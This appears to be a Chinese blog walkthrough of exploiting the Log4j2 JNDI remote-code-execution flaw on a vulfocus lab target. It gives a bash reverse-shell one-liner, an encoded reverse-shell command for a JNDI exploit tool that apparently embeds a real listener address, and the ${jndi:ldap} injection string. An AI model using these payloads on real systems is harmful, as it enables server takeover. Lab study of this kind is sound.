log4j2 RCE

admin 2022年3月30日20:15:16评论66 views字数 1095阅读3分39秒阅读模式

网上的log4j2那么多呀,而我只是其中一个~~~


0X01 前言

想必各位看官,也有所了解,这里不做多余解释,复制粘贴一下。

Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。

12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。据悉,Apache Log4j 2.x <= 2.14.1 版本均会受到影响。可能的受影响应用包括但不限于:Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、Elasticsearch、Flume、Dubbo、Redis、Logstash、Kafka 等。


0x02 废话篇

log4j2 我从网上看了两种方式,一种利用python http.server 端口(这里是python3,python 2是另一个命令)起一个web服务,让靶机解析jndi命令,解析访问攻击者的VPS远程调用已经准备好的恶意class文件,从而达到rce,这里不做多赘述,这里使用的是另一种相对来说简单一点。


0x03 靶场环境


镜像:vulfocus log4j2


0x04 漏洞利用


log4j2 RCE


log4j2 RCE


抓包测试

log4j2 RCE


监听10777端口

log4j2 RCE


Bash命令复制粘贴吧,注意不要写错了,比如空格啥的bash -i >& /dev/tcp/监听ip/port 0>&1
java8 -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 攻击ip -C "bash -c {echo,YmFzaCAtaSA+JiZGV2L3RjcC80Mi4xOTIuMjI3LjMyLzEwNzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

log4j2 RCE


${jndi:ldap://ip:port/#filename}

log4j2 RCE


log4j2 RCE


发送请求

log4j2 RCE


查看监听的端口会发现已经拿到shell了

log4j2 RCE


这里如果没有成功:1.检查一下端口开了吗2.检查一下命令错了吗


原文始发于微信公众号(SUMMER渗透学习):log4j2 RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日20:15:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   log4j2 RCEhttp://cn-sec.com/archives/853943.html

发表评论

匿名网友 填写信息